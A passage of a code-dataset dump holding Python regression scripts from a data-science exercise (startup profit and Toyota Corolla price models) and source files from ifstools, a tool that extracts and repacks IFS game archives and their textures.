shows how, on removing those outliers, the R^Squared value has improved.\r\n'''\r\n Models Variables Named in the code R^Squared Values\r\n0 Model 1 mod1.rsquared 0.775568\r\n1 Model 1 New nmod1.rsquared 0.775270\r\n2 Final Model 2 mod2_new.rsquared 0.803485\r\n3 Model 2 New mod2_new.rsquared 0.803485\r\n4 Final Model 2 fmod2.rsquared 0.803731\r\n5 Model 3 mod3.rsquared 0.815282\r\n6 Model 3 New mod3_new.rsquared 0.815236\r\n7 Final Model 3 final_mod3.rsquared 0.815467\r\n'''" },
{ "alpha_fraction": 0.5905848741531372, "alphanum_fraction": 0.6257132887840271, "avg_line_length": 54.64646530151367, "blob_id": "e53bd70368af0c15a8868e689099e5f7eb907571", "content_id": "986f7a70da345b5020817e2a2cb681d8db6feb3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5608, "license_type": "no_license", "max_line_length": 144, "num_lines": 99, "path": "/50_Startups_Python Codes.py", "repo_name": "neeraj2296/Multi-Linear-Regression-ExcelR", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 19 07:39:58 2020\r\n\r\n@author: Neeraj Kumar S J\r\n\"\"\"\r\n############################################# Importing the Modules ##############################################\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.formula.api as smf\r\nfrom sklearn import preprocessing\r\nfrom ml_metrics import rmse\r\n############################################# Importing the dataset ##############################################\r\n#toy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\ToyotaCorolla.csv\")\r\n#Stu = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Toyotacorolla.csv\")\r\nStu = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\50_Startups.csv\", encoding = \"ISO-8859-1\")\r\nstu = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\50_Startups.csv\",encoding = \"ISO-8859-1\")\r\nstu\r\nstu.describe()\r\nstu.columns = 'RD','Ad','MS','St','Pr'\r\n############################################# Label Encoding the state variable ##################################\r\nLe = preprocessing.LabelEncoder()\r\nstu['St_t'] = Le.fit_transform(stu['St'])\r\nstu = stu.drop('St',axis = 1)\r\nstu.columns = 'RD','Ad','MS','Pr','St'\r\n#finding the correlation between variables\r\ncor_stu = stu.corr()\r\n############################################# Visualizing and normalizing the data to remove outliers ###########\r\n#sstu = stu.drop('St',axis = 1)\r\nn_stu = 
preprocessing.normalize(stu)\r\nplt.hist(n_stu)\r\nimport seaborn as sns\r\nsns.pairplot(stu)\r\n\r\n############################################# Building the model1 ################################################\r\n\r\nmod1 = smf.ols('Pr~RD+Ad+MS+St',data=stu).fit()\r\nmod1.summary()#Since the p values for Ad, Ms and St are above than 0.05, so lets check for significance\r\n\r\nmod1_Ad = smf.ols('Pr~Ad',data=stu).fit()#applying model 1 for only Ad against profit\r\nmod1_Ad.summary()# looks like there is 16.9% of errors in prediction caused by Ad variable\r\n\r\nmod1_MS = smf.ols('Pr~MS',data=stu).fit()#applying model 1 for only MS against profit\r\nmod1_MS.summary()#Shows that it is significant\r\n\r\nmod1_St = smf.ols('Pr~St',data=stu).fit()#applying model 1 for only St against profit\r\nmod1_St.summary()#looks like there is 48.2% of errors in prediction caused by St variable\r\n\r\nimport statsmodels.api as sm\r\nsm.graphics.influence_plot(mod1)#checking the data points which are influencing\r\n\r\ne_stu = stu.drop(stu.index[[49,48,46,19]],axis = 0)# Looks like 49,48,46,19 data points are influencing, \r\n # Hence we remove it.\r\nmod1_new = smf.ols('Pr~RD+Ad+MS',data=e_stu).fit()# Applying model 1 for newly created dataset with variables \r\n # Ad, Rd and MS against profit, removing St as it is not \r\n # explaining the profit variables.\r\nmod1_new.summary()#Since the p values for Ad and MS are above than 0.05, so lets check for significance\r\n# Hence we calculate vif values for every varaible against other two variables among RD, Ad and MS\r\n# Whose vif value must be less than 10 for the variable to be significant\r\nrsq_RD = smf.ols('RD~Ad+MS',data=e_stu).fit().rsquared# Ad and MS against RD\r\nvif_RD = 1/(1-rsq_RD)# = 1.19698289102702, Hence significant\r\n\r\nrsq_MS = smf.ols('MS~RD+Ad',data=e_stu).fit().rsquared# Ad and RD against MS \r\nvif_MS = 1/(1-rsq_MS)# = 2.99273159509313, Hence significant\r\n\r\nrsq_Ad = smf.ols('Ad~MS+RD',data=e_stu).fit().rsquared# RD and MS against Ad\r\nvif_Ad = 1/(1-rsq_Ad)# = 3.04709935040856, Hence significant\r\n\r\nd1 = {'Variables':['RD','MS','Ad'],'VIF':[vif_RD,vif_MS,vif_Ad]}# Combining the vif values wrt its variables\r\nVif_frame = pd.DataFrame(d1)# To a data frame\r\nVif_frame\r\n\r\nsm.graphics.plot_partregress_grid(mod1_new)#Plotting regression models to check which variables explaining the most\r\n\r\nfmod1_new = smf.ols('Pr~RD+MS',data=e_stu).fit()#We shall be removing Ad, even though it has feasible vif values, \r\n #it does'nt have feasible p values to model 1, Hence the model 1 is\r\n #created without Ad\r\nfmod1_new.summary()# Looks R Squared value of the model and the p values of variable are feasible\r\n\r\npred1 = fmod1_new.predict(e_stu)#Predicting the price using model1\r\nrootmse = rmse(pred1,e_stu.Pr)#calculating the root mean square error\r\nrootmse# = 7076.114277848526\r\nact1 = e_stu.Pr\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])\r\ndf#created the data set of predicted and actual prices.\r\n#Creating a table for all the Rsquared Values of the diffrent models that was built during correction of influenicing poins in the data set.\r\nvalues = list([mod1.rsquared,mod1_new.rsquared,fmod1_new.rsquared])\r\ncoded_variables = list(['mod1.rsquared','mod1_new.rsquared','fmod1_new.rsquared'])\r\nvariables = list(['Model 1','Model 1 New','Final Model 1'])\r\n#R_Squared_value_Of_models = {'Variables':[],'R^2 Value':[]}\r\nRsquared_model = 
pd.DataFrame(list(zip(variables,coded_variables,values)),columns = ['Models','Variables Named in the code','R^Squared Values'])\r\nRsquared_model#Below is the table that shows how, on removing those outliers, the R^Squared value has improved.\r\n'''\r\n Models Variables Named in the code R^Squared Values\r\n0 Model 1 mod1.rsquared 0.950746\r\n1 Model 1 New mod1_new.rsquared 0.962343\r\n2 Final Model 1 fmod1_new.rsquared 0.961076\r\n...\r\n'''" }, { "alpha_fraction": 0.47148409485816956, "alphanum_fraction": 0.5077197551727295, "avg_line_length": 73.5793685913086, "blob_id": "64df199b17adf22b56f7de9cebfd544cf84f28ba", "content_id": "bad55b5a32f3c025268ed657b9500c5da04d87cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9521, "license_type": "no_license", "max_line_length": 423, "num_lines": 126, "path": "/Toyota-Python_codes.py", "repo_name": "neeraj2296/Multi-Linear-Regression-ExcelR", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 18 13:31:07 2020\r\n\r\n@author: Neeraj Kumar S J\r\n\"\"\"\r\n############################################################## Importing the necessary modules ########################################################################################################################################################################################################################################################################################################################################\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.formula.api as smf\r\nfrom sklearn import preprocessing\r\nfrom ml_metrics import rmse\r\n############################################################## Importing the dataset ##################################################################################################################################################################################################################################################################################################################################################\r\n#toy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\ToyotaCorolla.csv\")\r\n#toy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Toyotacorolla.csv\")\r\ntoy = pd.read_csv(\"E:\\\\Neeraj\\\\Exam and Careers\\\\DataScience\\\\Data Sets\\\\Toyotacorolla.csv\",encoding = \"ISO-8859-1\")\r\ntoy.columns#Checking the columns which could be removed\r\ne_toy = toy.drop(['Id', 'Model', 'Mfg_Month', 'Mfg_Year','Fuel_Type', 'Met_Color', 'Color', 'Automatic', 'Cylinders', 'Mfr_Guarantee', 'BOVAG_Guarantee', 'Guarantee_Period', 'ABS', 'Airbag_1', 'Airbag_2','Airco', 'Automatic_airco', 'Boardcomputer', 'CD_Player','Central_Lock', 'Powered_Windows', 'Power_Steering', 'Radio','Mistlamps', 'Sport_Model', 'Backseat_Divider', 'Metallic_Rim','Radio_cassette', 'Tow_Bar'],axis = 1)\r\ne_toy.describe()\r\ncor_toy = e_toy.corr()#checking the correlation between variables\r\ncor_toy.columns\r\ne_toy.columns = 'Price','Age','KM','HP','cc','Dr','gr','Qt','Wt'#Editing the column names\r\nimport seaborn as sns\r\nsns.pairplot(e_toy)#Checking for highly collinear variables\r\n############################################################## Building Model 1 
#######################################################################################################################################################################################################################################################################################################################################################\r\nmod1 = smf.ols('Price ~ Age+KM+HP+cc+Dr+gr+Qt+Wt',data=e_toy).fit()\r\nmod1.summary()\r\n#Since the p values for cc and Dr are above than 0.05, so lets check for significance\r\nmod_1c = smf.ols('Price ~ cc',data=e_toy).fit()#applying model 1 for only cc against price\r\nmod_1c.summary()#Shows that it is significant\r\n\r\nmod_1d = smf.ols('Price~Dr',data=e_toy).fit()#applying model 1 for only Dr against price\r\nmod_1d.summary()#Shows that it is significant\r\n\r\nmod1_dc = smf.ols('Price~cc+Dr',data=e_toy).fit()#applying model 1 for Dr and cc against price\r\nmod1_dc.summary()#Shows that both are significant\r\n\r\nimport statsmodels.api as sm\r\nsm.graphics.influence_plot(mod1)#checking the data points which are influencing\r\n\r\ne_new = e_toy.drop(e_toy.index[[80,960,221]],axis = 0)#Looks like 80,860,221 data points are influencing, Hence we remove it.\r\n\r\nmod1_new = smf.ols('Price ~ Age+KM+HP+cc+Dr+gr+Qt+Wt',data=e_new).fit()#Applying model1 for the newly created data set\r\nmod1_new.summary()#Looks good here as all the variable's p values are below 0.05\r\nact1 = e_new.Price\r\n#sm.graphics.plot_partregress_grid(mod1_new)\r\n#Prdicting Prices using mod1\r\npred1 = mod1_new.predict(e_new)#Predicting the price using model1\r\nrootmse = rmse(pred1,e_new.Price)#calculating the root mean square error\r\nrootmse# = 1227.473986005888\r\ndf = pd.DataFrame(list(zip(pred1, act1)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices.\r\ndf\r\n'''\r\n############################################################## BUilding Model 2 #######################################################################################################################################################################################################################################################################################################################################################\r\nmod2 = smf.ols('Price ~ np.log(Age)+KM+HP+cc+Dr+gr+Qt+Wt',data=e_new).fit()\r\nmod2.summary()\r\n#Since the p values for cc and Dr are above than 0.05, so lets check for significance\r\nmod_2d = smf.ols('Price~Dr',data=e_new).fit()#applying model 2 for only Dr against price\r\nmod_2d.summary()#Shows that it is significant\r\n#e_new2 = e_new2.drop(['Dr'], axis = 1)\r\n\r\n#import statsmodels.api as sm\r\nsm.graphics.influence_plot(mod2)#checking the data points which are influencing\r\n\r\ne_new2 = e_new.drop(e_new.index[[184,185,991,956,109,110,111,49]],axis = 0)#Looks like 184,185,991,956,109,110,111,49 data points are influencing, Hence we remove it.\r\n\r\nmod2_new = smf.ols('Price ~ np.log(Age)+KM+HP+cc+Dr+gr+Qt+Wt',data=e_new2).fit()#Applying model2 for the newly created data set\r\nmod2_new.summary()#Looks Dr variable values are not yet below 0.05\r\n\r\nsm.graphics.influence_plot(mod2_new)#checking the data points which are influencing\r\n\r\n#e_new3 = e_new2.drop(e_new2.index[[184,185,991,956,109]],axis = 0)#Looks like 184,185,991,956,109 data points are influencing, Hence we remove it.\r\nsm.graphics.plot_partregress_grid(mod2_new)\r\n\r\nfmod2_new = smf.ols('Price ~ np.log(Age)+KM+HP+cc+gr+Qt+Wt',data=e_new2).fit()#Applying 
model2 for the newly created data set and we shall remove the Dr variable\r\nfmod2_new.summary()#Looks good here as all the variable's p values are below 0.05\r\n\r\n#Predicting Prices using mod2\r\npred2 = mod2_new.predict(e_new2)\r\nrootmse2 = rmse(pred2,e_new2.Price)\r\nrootmse2 # = 1256.1065020469682 <<Seems like model2 is slightly worse than model 1, based on Root Mean Square \r\n\r\nact2 = e_new2.Price\r\ndf = pd.DataFrame(list(zip(pred2, act2)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n#sns.pairplot(e_new3);sns.pairplot(e_new.Prices, pred2, color='black')\r\n\r\n############################################################## Building Model 3 #######################################################################################################################################################################################################################################################################################################################################################\r\nmod3 = smf.ols('Price ~ np.log(Age)+np.log(KM)+HP+cc+gr+Qt+Wt',data=e_new3).fit()\r\nmod3.summary()\r\n#Since the p values of all variables are less than 0.05, we can go for prediction\r\n#Predicting Prices using mod3\r\npred3 = mod3.predict(e_new3)\r\nrootmse3 = rmse(pred3,e_new3.Price)\r\nrootmse3 # = 1356.442261894533 <<Seems like model3 is not better than model 1 or 2, based on Root Mean Square , but it is better in terms of Rsquared value\r\nact3 = e_new3.Price\r\ndf = pd.DataFrame(list(zip(pred3, act3)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n#sns.pairplot(e_new3);sns.pairplot(e_new.Prices, pred2, color='black')\r\n############################################################## Building Model 4 #######################################################################################################################################################################################################################################################################################################################################################\r\n\r\nmod4 = smf.ols('Price ~ np.log(Age)+np.log(KM)+np.log(cc)+HP+gr+Qt+Wt',data=e_new3).fit()\r\nmod4.summary()\r\n#Since the p values of all variables are less than 0.05, we can go for prediction\r\n#Predicting Prices using mod4\r\npred4 = mod4.predict(e_new3)\r\nrootmse4 = rmse(pred4,e_new3.Price)\r\nrootmse4 # = 1356.442261894533 <<Seems like model4 is not better than model 1 or 2, based on Root Mean Square , but it is better in terms of Rsquared value\r\nact4 = e_new3.Price\r\ndf = pd.DataFrame(list(zip(pred4, act4)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n############################################################## Building Model 5 #######################################################################################################################################################################################################################################################################################################################################################\r\n\r\nmod5 = smf.ols('Price ~ np.log(Age)+np.log(KM)+np.log(cc)+HP+np.log(gr)+Qt+Wt',data=e_new3).fit()\r\nmod5.summary()\r\n#Since the p values of all variables are less than 0.05, 
we can go for prediction\r\n#Predicting Prices using mod5\r\npred5 = mod5.predict(e_new3)\r\nrootmse5 = rmse(pred5,e_new3.Price)\r\nrootmse5 # = 1356.442261894533 <<Seems like model5 is not better than model 1 or 2, based on Root Mean Square , but it is better in terms of Rsquared value\r\nact5 = e_new3.Price\r\ndf = pd.DataFrame(list(zip(pred5, act5)),columns =['Predicted Prices', 'Actual Prices'])#creating the data set of predicted and actual prices. \r\ndf\r\n'''" } ]
3
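The Toyota-Python_codes.py file above repeats one workflow per model: fit an OLS formula, plot influence, drop the high-influence rows, refit, and compare RMSE and R^Squared. Below is a minimal, self-contained sketch of that loop; the column names echo the script, but the synthetic data, the fit_and_score helper, and the 4/n Cook's-distance cutoff are illustrative assumptions, not code from the repo.

# Hypothetical sketch of the fit -> drop influential rows -> refit -> compare
# pattern used throughout Toyota-Python_codes.py. The data is synthetic;
# fit_and_score and the 4/n Cook's-distance cutoff are assumptions for this example.
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(0)
n = 200
data = pd.DataFrame({'Age': rng.uniform(1, 80, n),
                     'KM': rng.uniform(1e3, 2e5, n),
                     'HP': rng.uniform(60, 120, n)})
data['Price'] = 20000 - 150*data.Age - 0.02*data.KM + 30*data.HP + rng.normal(0, 500, n)

def fit_and_score(formula, frame):
    # Fit an OLS model and return it together with its RMSE and R^2
    model = smf.ols(formula, data=frame).fit()
    resid = frame['Price'] - model.predict(frame)
    return model, float(np.sqrt((resid**2).mean())), model.rsquared

mod, rmse_all, r2_all = fit_and_score('Price ~ Age + KM + HP', data)
# Drop high-influence rows (Cook's distance above the common 4/n rule of thumb)
cooks = mod.get_influence().cooks_distance[0]
trimmed = data.loc[cooks < 4/len(data)]
mod_new, rmse_trim, r2_trim = fit_and_score('Price ~ Age + KM + HP', trimmed)
print(pd.DataFrame([['all rows', rmse_all, r2_all],
                    ['influential rows dropped', rmse_trim, r2_trim]],
                   columns=['Model', 'RMSE', 'R^Squared']))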
ReimuYk/ifstools
https://github.com/ReimuYk/ifstools
1ac874bc105d9c49384da3b97f31ce3629727f0f
cfcb369a0271d6c53df38b769c496ca8149d9a51
701dc823c84cca9d296f164ecb2fdfdb9814822c
refs/heads/master
2023-03-17T10:51:09.367506
2020-10-25T06:56:07
2020-10-25T06:56:07
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5509524941444397, "alphanum_fraction": 0.5572406053543091, "avg_line_length": 34.28858947753906, "blob_id": "aceb4411502d70f811410fa94a715cfc94991581", "content_id": "fa2cb6cf6a1e5122c8d0896d1d5e6e3cb325a078", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10814, "license_type": "permissive", "max_line_length": 141, "num_lines": 298, "path": "/ifstools/ifs.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from collections import defaultdict\r\nfrom multiprocessing import Pool\r\nfrom os.path import basename, dirname, splitext, join, isdir, isfile, getmtime\r\nfrom os import utime, walk\r\nfrom io import BytesIO\r\nimport itertools\r\nimport hashlib\r\nimport lxml.etree as etree\r\nfrom time import time as unixtime\r\n\r\nfrom tqdm import tqdm\r\nfrom kbinxml import KBinXML\r\nfrom kbinxml.bytebuffer import ByteBuffer\r\n\r\nfrom .handlers import GenericFolder, MD5Folder, ImageFile, ImageCanvas\r\nfrom . import utils\r\n\r\nSIGNATURE = 0x6CAD8F89\r\n\r\nFILE_VERSION = 3\r\n\r\n# must be toplevel or can't be pickled\r\ndef _extract(args):\r\n f, path, kwargs = args\r\n f.extract(path, **kwargs)\r\n return f\r\n\r\ndef _load(args):\r\n f, kwargs = args\r\n f.preload(**kwargs)\r\n return f.full_path\r\n\r\nclass FileBlob(object):\r\n ''' a basic wrapper around a file to deal with IFS data offset '''\r\n def __init__(self, file, offset):\r\n self.file = file\r\n self.offset = offset\r\n\r\n def get(self, offset, size):\r\n self.file.seek(offset + self.offset)\r\n return self.file.read(size)\r\n\r\nclass IFS:\r\n def __init__(self, path, super_disable = False, super_skip_bad = False,\r\n super_abort_if_bad = False):\r\n if isfile(path):\r\n self.load_ifs(path, super_disable, super_skip_bad, super_abort_if_bad)\r\n elif isdir(path):\r\n self.load_dir(path)\r\n else:\r\n raise IOError('Input path {} does not exist'.format(path))\r\n\r\n def load_ifs(self, path, super_disable = False, super_skip_bad = False,\r\n super_abort_if_bad = False):\r\n self.is_file = True\r\n\r\n name = basename(path)\r\n self.ifs_out = name\r\n self.folder_out = splitext(name)[0] + '_ifs'\r\n self.default_out = self.folder_out\r\n\r\n self.file = open(path, 'rb')\r\n header = ByteBuffer(self.file.read(36))\r\n\r\n signature = header.get_u32()\r\n if signature != SIGNATURE:\r\n raise IOError('Given file was not an IFS file!')\r\n self.file_version = header.get_u16()\r\n # next u16 is just NOT(version)\r\n assert header.get_u16() ^ self.file_version == 0xFFFF\r\n self.time = header.get_u32()\r\n ifs_tree_size = header.get_u32()\r\n manifest_end = header.get_u32()\r\n self.data_blob = FileBlob(self.file, manifest_end)\r\n\r\n self.manifest_md5 = None\r\n if self.file_version > 1:\r\n self.manifest_md5 = header.get_bytes(16)\r\n\r\n self.file.seek(header.offset)\r\n self.manifest = KBinXML(self.file.read(manifest_end-header.offset))\r\n self.tree = GenericFolder(self.data_blob, self.manifest.xml_doc,\r\n super_disable=super_disable, super_skip_bad=super_skip_bad,\r\n super_abort_if_bad=super_abort_if_bad\r\n )\r\n\r\n # IFS files repacked with other tools usually have wrong values - don't validate this\r\n #assert ifs_tree_size == self.manifest.mem_size\r\n\r\n def load_dir(self, path):\r\n self.is_file = False\r\n self.file = None\r\n\r\n path = path.rstrip('/\\\\')\r\n self.folder_out = basename(path)\r\n if '_ifs' in self.folder_out:\r\n self.ifs_out = self.folder_out.replace('_ifs', '.ifs')\r\n else:\r\n 
self.ifs_out = self.folder_out + '.ifs'\r\n self.default_out = self.ifs_out\r\n\r\n self.file_version = FILE_VERSION\r\n self.time = int(getmtime(path))\r\n self.data_blob = None\r\n self.manifest = None\r\n\r\n os_tree = self._create_dir_tree(path)\r\n self.tree = GenericFolder(None, os_tree)\r\n\r\n def _create_dir_tree(self, path):\r\n tree = self._create_dir_tree_recurse(walk(path))\r\n if 'ifs_manifest.xml' in tree['files']:\r\n tree['files'].remove('ifs_manifest.xml')\r\n\r\n return tree\r\n\r\n def _create_dir_tree_recurse(self, walker):\r\n tree = {}\r\n\r\n root, dirs, files = next(walker)\r\n tree['path'] = root\r\n tree['files'] = files\r\n tree['folders'] = []\r\n for dir in dirs:\r\n tree['folders'].append(self._create_dir_tree_recurse(walker))\r\n\r\n return tree\r\n\r\n def close(self):\r\n if self.file:\r\n self.file.close()\r\n\r\n def __str__(self):\r\n return str(self.tree)\r\n\r\n def extract(self, progress = True, recurse = True, tex_only = False,\r\n extract_manifest = False, path = None, rename_dupes = False, **kwargs):\r\n if path is None:\r\n path = self.folder_out\r\n if tex_only:\r\n kwargs['use_cache'] = False\r\n utils.mkdir_silent(path)\r\n utime(path, (self.time, self.time))\r\n\r\n if extract_manifest and self.manifest and not tex_only:\r\n with open(join(path, 'ifs_manifest.xml'), 'wb') as f:\r\n f.write(self.manifest.to_text().encode('utf8'))\r\n\r\n # build the tree\r\n for folder in self.tree.all_folders:\r\n if tex_only and folder.name == 'tex':\r\n self.tree = folder\r\n # make it root to discourage repacking\r\n folder.name = ''\r\n for f in folder.all_files:\r\n f.path = ''\r\n break\r\n elif tex_only:\r\n continue\r\n f_path = join(path, folder.full_path)\r\n utils.mkdir_silent(f_path)\r\n utime(f_path, (self.time, self.time))\r\n\r\n # handle different-case-but-same-name for Windows\r\n same_name = defaultdict(list)\r\n for name, obj in folder.files.items():\r\n same_name[name.lower()].append(obj)\r\n\r\n for files in same_name.values():\r\n # common base case of \"sane ifs file\"\r\n if len(files) == 1:\r\n continue\r\n\r\n # make them 'a (1)', 'a (2)' etc\r\n if rename_dupes:\r\n for i, f in enumerate(files[1:]):\r\n base, ext = splitext(f.name)\r\n f.name = base + ' ({})'.format(i+1) + ext\r\n elif progress: # warn if not silenced\r\n all_names = ', '.join([f.name for f in files])\r\n tqdm.write('WARNING: Files with same name and differing case will overwrite on Windows ({}). '.format(all_names) +\r\n 'Use --rename-dupes to extract without loss')\r\n # else just do nothing\r\n\r\n # extract the files\r\n for f in tqdm(self.tree.all_files, disable = not progress):\r\n # allow recurse + tex_only to extract ifs files\r\n if tex_only and not isinstance(f, ImageFile) and not isinstance(f, ImageCanvas) and not (recurse and f.name.endswith('.ifs')):\r\n continue\r\n f.extract(path, **kwargs)\r\n if progress:\r\n tqdm.write(f.full_path)\r\n if recurse and f.name.endswith('.ifs'):\r\n rpath = join(path, f.full_path)\r\n i = IFS(rpath)\r\n i.extract(progress=progress, recurse=recurse, tex_only=tex_only,\r\n extract_manifest=extract_manifest, path=rpath.replace('.ifs','_ifs'),\r\n rename_dupes=rename_dupes, **kwargs)\r\n\r\n\r\n # you can't pickle open files, so this won't work. 
Perhaps there is a way around it?\r\n '''to_extract = (f for f in self.tree.all_files if not(tex_only and not isinstance(f, ImageFile) and not isinstance(f, ImageCanvas)))\r\n\r\n p = Pool()\r\n args = zip(to_extract, itertools.cycle((path,)), itertools.cycle((kwargs,)))\r\n\r\n to_recurse = []\r\n for f in tqdm(p.imap_unordered(_extract, args)):\r\n if progress:\r\n tqdm.write(f)\r\n if recurse and f.name.endswith('.ifs'):\r\n to_recurse.append(join(path, f.full_path))\r\n\r\n for rpath in recurse:\r\n i = IFS(rpath)\r\n i.extract(progress=progress, recurse=recurse, tex_only=tex_only,\r\n extract_manifest=extract_manifest, path=rpath.replace('.ifs','_ifs'), **kwargs)'''\r\n\r\n def repack(self, progress = True, path = None, **kwargs):\r\n if path is None:\r\n path = self.ifs_out\r\n # open first in case path is bad\r\n ifs_file = open(path, 'wb')\r\n\r\n self.data_blob = BytesIO()\r\n\r\n self.manifest = KBinXML(etree.Element('imgfs'))\r\n manifest_info = etree.SubElement(self.manifest.xml_doc, '_info_')\r\n\r\n # the important bit\r\n data = self._repack_tree(progress, **kwargs)\r\n\r\n data_md5 = etree.SubElement(manifest_info, 'md5')\r\n data_md5.attrib['__type'] = 'bin'\r\n data_md5.attrib['__size'] = '16'\r\n data_md5.text = hashlib.md5(data).hexdigest()\r\n\r\n data_size = etree.SubElement(manifest_info, 'size')\r\n data_size.attrib['__type'] = 'u32'\r\n data_size.text = str(len(data))\r\n\r\n manifest_bin = self.manifest.to_binary()\r\n manifest_hash = hashlib.md5(manifest_bin).digest()\r\n\r\n head = ByteBuffer()\r\n head.append_u32(SIGNATURE)\r\n head.append_u16(self.file_version)\r\n head.append_u16(self.file_version ^ 0xFFFF)\r\n head.append_u32(int(unixtime()))\r\n head.append_u32(self.manifest.mem_size)\r\n\r\n manifest_end = len(manifest_bin) + head.offset + 4\r\n if self.file_version > 1:\r\n manifest_end += 16\r\n\r\n head.append_u32(manifest_end)\r\n\r\n if self.file_version > 1:\r\n head.append_bytes(manifest_hash)\r\n\r\n ifs_file.write(head.data)\r\n ifs_file.write(manifest_bin)\r\n ifs_file.write(data)\r\n\r\n ifs_file.close()\r\n\r\n def _repack_tree(self, progress = True, **kwargs):\r\n folders = self.tree.all_folders\r\n files = self.tree.all_files\r\n\r\n # Can't pickle lmxl, so to dirty-hack land we go\r\n kbin_backup = []\r\n for folder in folders:\r\n if isinstance(folder, MD5Folder):\r\n kbin_backup.append(folder.info_kbin)\r\n folder.info_kbin = None\r\n\r\n needs_preload = (f for f in files if f.needs_preload or not kwargs['use_cache'])\r\n args = list(zip(needs_preload, itertools.cycle((kwargs,))))\r\n p = Pool()\r\n for f in tqdm(p.imap_unordered(_load, args), desc='Caching', total=len(args), disable = not progress):\r\n if progress:\r\n tqdm.write(f)\r\n\r\n p.close()\r\n p.terminate()\r\n\r\n # restore stuff from before\r\n for folder in folders:\r\n if isinstance(folder, MD5Folder):\r\n folder.info_kbin = kbin_backup.pop(0)\r\n\r\n tqdm_progress = None\r\n if progress:\r\n tqdm_progress = tqdm(desc='Writing', total=len(files))\r\n self.tree.repack(self.manifest.xml_doc, self.data_blob, tqdm_progress, **kwargs)\r\n\r\n return self.data_blob.getvalue()\r\n" }, { "alpha_fraction": 0.5707113146781921, "alphanum_fraction": 0.5746164321899414, "avg_line_length": 35.212120056152344, "blob_id": "15ab3a9547863a42f58c5d091f19fb9c5d713b0b", "content_id": "fed22160a3d926e9b2477001981c61c720ea8dce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3585, "license_type": "permissive", "max_line_length": 
94, "num_lines": 99, "path": "/ifstools/handlers/TexFolder.py", "repo_name": "ReimuYk/ifstools", "src_encoding": "UTF-8", "text": "from io import BytesIO\n\nfrom kbinxml import KBinXML\nfrom tqdm import tqdm\nfrom PIL import Image, ImageDraw\n\nfrom . import MD5Folder, ImageFile, GenericFile\nfrom .ImageDecoders import cachable_formats\n\nclass TextureList(GenericFile):\n def _load_from_filesystem(self, **kwargs):\n raw = GenericFile._load_from_filesystem(self, **kwargs)\n k = KBinXML(raw)\n # fallback to a type we can encode\n for tex in k.xml_doc.iterchildren():\n if tex.attrib['format'] not in cachable_formats:\n tex.attrib['format'] = 'argb8888rev'\n\n return k.to_binary()\n\nclass ImageCanvas(GenericFile):\n def __init__(self, name, size, images, parent):\n self.name = '_canvas_{}.png'.format(name)\n self._packed_name = self.name\n self.time = parent.time\n self.path = parent.path\n\n self.images = images\n self.img_size = size\n\n def extract(self, base, dump_canvas = False, **kwargs):\n if dump_canvas:\n GenericFile.extract(self, base, **kwargs)\n\n def load(self, draw_bbox = False, **kwargs):\n ''' Makes the canvas.\n This could be far speedier if it copied raw pixels, but that would\n take far too much time to write vs using Image inbuilts '''\n im = Image.new('RGBA', self.img_size)\n draw = None\n if draw_bbox:\n draw = ImageDraw.Draw(im)\n\n for sprite in self.images:\n data = sprite.load()\n sprite_im = Image.open(BytesIO(data))\n\n size = sprite.imgrect\n im.paste(sprite_im, (size[0], size[2]))\n if draw_bbox:\n draw.rectangle((size[0], size[2], size[1], size[3]), outline='red')\n\n del draw\n b = BytesIO()\n im.save(b, format = 'PNG')\n return b.getvalue()\n\n # since it's basically metadata, we ignore similarly to _cache\n def repack(self, manifest, data_blob, tqdm_progress, **kwargs):\n return\n\nclass TexFolder(MD5Folder):\n def __init__(self, ifs_data, obj, parent = None, path = '', name = '', supers = None,\n super_disable = False, super_skip_bad = False, super_abort_if_bad = False):\n MD5Folder.__init__(self, ifs_data, obj, parent, path, name, supers,\n super_disable, super_skip_bad, super_abort_if_bad, 'image', '.png')\n\n def tree_complete(self):\n MD5Folder.tree_complete(self)\n\n if '_cache' in self.folders:\n self.folders.pop('_cache')\n\n if not self.info_kbin:\n return\n\n self.compress = self.info_kbin.xml_doc.attrib.get('compress')\n self.info_file.__class__ = TextureList\n\n self._create_images()\n\n def _create_images(self):\n for tex in self.info_kbin.xml_doc.iterchildren():\n folder = tex.attrib['name']\n fmt = tex.attrib['format']\n canvas_contents = []\n canvas_size = None\n for indiv in tex.iterchildren():\n if indiv.tag == 'size':\n canvas_size = self._split_ints(indiv.text)\n elif indiv.tag == 'image':\n name = indiv.attrib['name'] + '.png'\n if name in self.files:\n ImageFile.upgrade_generic(self.files[name], indiv, fmt, self.compress)\n canvas_contents.append(self.files[name])\n else:\n tqdm.write('Unknown texturelist.xml element 